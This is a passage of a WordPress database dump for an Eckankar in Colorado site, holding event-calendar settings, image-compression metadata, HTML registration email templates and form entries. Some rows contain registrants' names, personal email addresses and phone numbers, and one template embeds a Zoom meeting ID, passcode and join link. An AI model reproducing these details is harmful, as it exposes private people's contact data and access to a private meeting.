possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(169903,267230,'passster_activate_global_protection',NULL),(169904,267230,'passster_activate_protection',NULL),(169905,267230,'passster_protection_type','password'),(169906,267230,'_wp_old_date','2022-01-18'),(169907,267230,'boldgrid_in_page_containers','1'),(169908,267230,'_dp_original','265425'),(169909,267230,'_edit_lock','1663558034:2'),(169910,267230,'_edit_last','2'),(169911,267230,'_thumbnail_id','266373'),(169912,267231,'_edit_lock','1663644664:2'),(169913,267231,'_edit_last','2'),(193677,269201,'_seq_num','60'),(193682,269202,'_field_656','The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom'),(169999,267231,'_thumbnail_id','267233'),(170000,267233,'smush-info','The file was compressed from 74.59 KB to 74.59 KB saving 0 percent using WP-Optimize'),(170001,267233,'smush-complete','1'),(170002,267233,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:76378;s:12:\"smushed-size\";i:76378;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:6:{s:6:\"medium\";a:2:{s:8:\"original\";i:14065;s:10:\"compressed\";i:14065;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8514;s:10:\"compressed\";i:8514;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:58585;s:10:\"compressed\";i:58077;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25638;s:10:\"compressed\";i:25228;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:25177;s:10:\"compressed\";i:24863;}s:8:\"tileview\";a:2:{s:8:\"original\";i:31047;s:10:\"compressed\";i:30500;}}}'),(193676,269201,'_form_id','61'),(169916,267220,'original-file','2022/09/nature-bench-light-1-updraft-pre-smush-original.jpg'),(169917,267220,'smush-complete','1'),(169918,267220,'smush-info','The file was compressed from 111.21 KB to 106.12 KB saving 4.58 percent using WP-Optimize'),(169919,267220,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:113884;s:12:\"smushed-size\";i:108670;s:15:\"savings-percent\";d:4.58;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:113884;s:10:\"compressed\";i:108670;}s:6:\"medium\";a:2:{s:8:\"original\";i:19842;s:10:\"compressed\";i:19510;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8562;s:10:\"compressed\";i:8496;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:28678;s:10:\"compressed\";i:28135;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:47676;s:10:\"compressed\";i:46634;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:32986;s:10:\"compressed\";i:32235;}s:8:\"tileview\";a:2:{s:8:\"original\";i:36004;s:10:\"compressed\";i:35227;}}}'),(169920,267217,'original-file','2022/09/fall-leaves-close-9-updraft-pre-smush-original.jpg'),(169921,267217,'smush-info','The file was compressed from 282.93 KB to 271.60 KB saving 4 percent using WP-Optimize'),(169922,267217,'smush-complete','1'),(169923,267217,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:289723;s:12:\"smushed-size\";i:278120;s:15:\"savings-percent\";d:4;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:289723;s:10:\"compressed\";i:278120;}s:6:\"medium\";a:2:{s:8:\"original\";i:18484;s:10:\"compressed\";i:17931;}s:5:\"large\";a:2:{s:8:\"original\";i:122824;s:10:\"compressed\";i:119813;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:79122;s:10:\"compressed\";i:76925;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:27869;s:10:\"compressed\";i:27212;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:45590;s:10:\"compressed\";i:44393;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:33303;s:10:\"compressed\";i:32394;}s:8:\"tileview\";a:2:{s:8:\"original\";i:32910;s:10:\"compressed\";i:32256;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:227845;s:10:\"compressed\";i:224236;}}}'),(169924,267223,'original-file','2022/09/sunset-shell-1-updraft-pre-smush-original.jpg'),(169925,267223,'smush-complete','1'),(169926,267223,'smush-info','The file was compressed from 51.15 KB to 50.03 KB saving 2.19 percent using WP-Optimize'),(169927,267223,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:52382;s:12:\"smushed-size\";i:51234;s:15:\"savings-percent\";d:2.19;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:52382;s:10:\"compressed\";i:51234;}s:6:\"medium\";a:2:{s:8:\"original\";i:10770;s:10:\"compressed\";i:10770;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4751;s:10:\"compressed\";i:4685;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:14642;s:10:\"compressed\";i:14642;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:22891;s:10:\"compressed\";i:22891;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:16312;s:10:\"compressed\";i:16312;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18344;s:10:\"compressed\";i:18344;}}}'),(169997,267233,'_wp_attached_file','2022/09/2022-esc-oct-soul-adv-2.jpg'),(169998,267233,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:802;s:6:\"height\";i:451;s:4:\"file\";s:35:\"2022/09/2022-esc-oct-soul-adv-2.jpg\";s:8:\"filesize\";i:76378;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"2022-esc-oct-soul-adv-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14065;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"2022-esc-oct-soul-adv-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8514;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"2022-esc-oct-soul-adv-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58585;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:35:\"2022-esc-oct-soul-adv-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25638;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:35:\"2022-esc-oct-soul-adv-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35354;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:35:\"2022-esc-oct-soul-adv-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25177;}s:8:\"tileview\";a:5:{s:4:\"file\";s:35:\"2022-esc-oct-soul-adv-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31047;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(169933,267231,'mec_color',''),(169934,267231,'mec_location_id','162'),(169935,267231,'mec_dont_show_map','0'),(169936,267231,'mec_organizer_id','1'),(169937,267231,'mec_read_more',''),(169938,267231,'mec_more_info',''),(169939,267231,'mec_more_info_title',''),(169940,267231,'mec_more_info_target','_self'),(169941,267231,'mec_cost',''),(169942,267231,'mec_currency','a:0:{}'),(169943,267231,'mec_additional_organizer_ids','a:0:{}'),(169944,267231,'mec_additional_location_ids','a:0:{}'),(169945,267231,'mec_date','a:5:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-21\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-23\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:6:\"allday\";s:1:\"1\";s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(169946,267231,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(169947,267231,'mec_certain_weekdays','a:0:{}'),(169948,267231,'mec_allday','1'),(169949,267231,'one_occurrence','0'),(169950,267231,'mec_hide_time','0'),(169951,267231,'mec_hide_end_time','0'),(169952,267231,'mec_comment',''),(169953,267231,'mec_timezone','global'),(169954,267231,'mec_countdown_method','global'),(169955,267231,'mec_public','1'),(169956,267231,'mec_start_date','2022-10-21'),(169957,267231,'mec_start_time_hour','8'),(169958,267231,'mec_start_time_minutes','00'),(169959,267231,'mec_start_time_ampm','AM'),(169960,267231,'mec_start_day_seconds','28800'),(169961,267231,'mec_end_date','2022-10-23'),(169962,267231,'mec_end_time_hour','6'),(169963,267231,'mec_end_time_minutes','00'),(169964,267231,'mec_end_time_ampm','PM'),(169965,267231,'mec_end_day_seconds','64800'),(169966,267231,'mec_repeat_status','0'),(169967,267231,'mec_repeat_type',''),(169968,267231,'mec_repeat_interval','1'),(169969,267231,'mec_repeat_end',''),(169970,267231,'mec_repeat_end_at_occurrences',''),(169971,267231,'mec_repeat_end_at_date',''),(169972,267231,'mec_advanced_days','a:0:{}'),(169973,267231,'mec_in_days',''),(169974,267231,'mec_not_in_days',''),(169975,267231,'mec_hourly_schedules','a:0:{}'),(169976,267231,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(169977,267231,'mec_tickets','a:0:{}'),(169978,267231,'mec_fees_global_inheritance','1'),(169979,267231,'mec_fees','a:0:{}'),(169980,267231,'mec_ticket_variations_global_inheritance','1'),(169981,267231,'mec_ticket_variations','a:0:{}'),(169982,267231,'mec_reg_fields_global_inheritance','1'),(169983,267231,'mec_reg_fields','a:0:{}'),(169984,267231,'mec_bfixed_fields','a:0:{}'),(169985,267231,'mec_op','a:0:{}'),(169986,267231,'mec_fields','a:0:{}'),(169987,267231,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(169988,267231,'mec_event_status','EventScheduled'),(169989,267231,'mec_moved_online_link',''),(169990,267231,'mec_cancelled_reason',''),(169991,267231,'mec_display_cancellation_reason_in_single_page',''),(169992,267231,'passster_activate_global_protection',NULL),(169993,267231,'passster_activate_protection',NULL),(169994,267231,'passster_protection_type','password'),(169995,267231,'boldgrid_hide_page_title','0'),(169996,267231,'boldgrid_in_page_containers','1'),(193657,269199,'_field_651','(303) 818-0047'),(193658,269199,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(193659,269199,'_field_649','Hi Gordon!'),(193660,269199,'_form_id','61'),(193661,269199,'_seq_num','58'),(193662,269200,'_field_654','Hugh'),(193663,269200,'_field_652','Barbour'),(193664,269200,'_field_653','hmbarbour@comcast.net'),(193665,269200,'_field_651','(720) 212-8695'),(193666,269200,'_field_656','The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom'),(170019,267237,'mec_color',''),(170020,267237,'mec_location_id','129'),(170021,267237,'mec_dont_show_map','0'),(170022,267237,'mec_organizer_id','1'),(170023,267237,'mec_read_more',''),(170024,267237,'mec_more_info',''),(170025,267237,'mec_more_info_title',''),(170026,267237,'mec_more_info_target','_self'),(170027,267237,'mec_cost',''),(170028,267237,'mec_currency','a:0:{}'),(170029,267237,'mec_additional_organizer_ids','a:0:{}'),(170030,267237,'mec_additional_location_ids','a:0:{}'),(170031,267237,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-10-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-10-09\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(170032,267237,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(170033,267237,'mec_certain_weekdays','a:0:{}'),(170034,267237,'mec_allday','0'),(170035,267237,'one_occurrence','0'),(170036,267237,'mec_hide_time','0'),(170037,267237,'mec_hide_end_time','0'),(170038,267237,'mec_comment',''),(170039,267237,'mec_timezone','global'),(170040,267237,'mec_countdown_method','global'),(170041,267237,'mec_public','1'),(170042,267237,'mec_start_date','2022-10-09'),(170043,267237,'mec_start_time_hour','10'),(170044,267237,'mec_start_time_minutes','30'),(170045,267237,'mec_start_time_ampm','AM'),(170046,267237,'mec_start_day_seconds','37800'),(170047,267237,'mec_end_date','2022-10-09'),(170048,267237,'mec_end_time_hour','11'),(170049,267237,'mec_end_time_minutes','30'),(170050,267237,'mec_end_time_ampm','PM'),(170051,267237,'mec_end_day_seconds','84600'),(170052,267237,'mec_repeat_status','0'),(170053,267237,'mec_repeat_type',''),(170054,267237,'mec_repeat_interval','1'),(170055,267237,'mec_repeat_end',''),(170056,267237,'mec_repeat_end_at_occurrences',''),(170057,267237,'mec_repeat_end_at_date',''),(170058,267237,'mec_advanced_days','a:0:{}'),(170059,267237,'mec_in_days',''),(170060,267237,'mec_not_in_days',''),(170061,267237,'mec_hourly_schedules','a:0:{}'),(170062,267237,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(170063,267237,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(170064,267237,'mec_fees_global_inheritance','1'),(170065,267237,'mec_fees','a:0:{}'),(170066,267237,'mec_ticket_variations_global_inheritance','1'),(170067,267237,'mec_ticket_variations','a:0:{}'),(170068,267237,'mec_reg_fields_global_inheritance','1'),(170069,267237,'mec_reg_fields','a:0:{}'),(170070,267237,'mec_bfixed_fields','a:0:{}'),(170071,267237,'mec_op','a:0:{}'),(170072,267237,'mec_fields','a:0:{}'),(170073,267237,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; 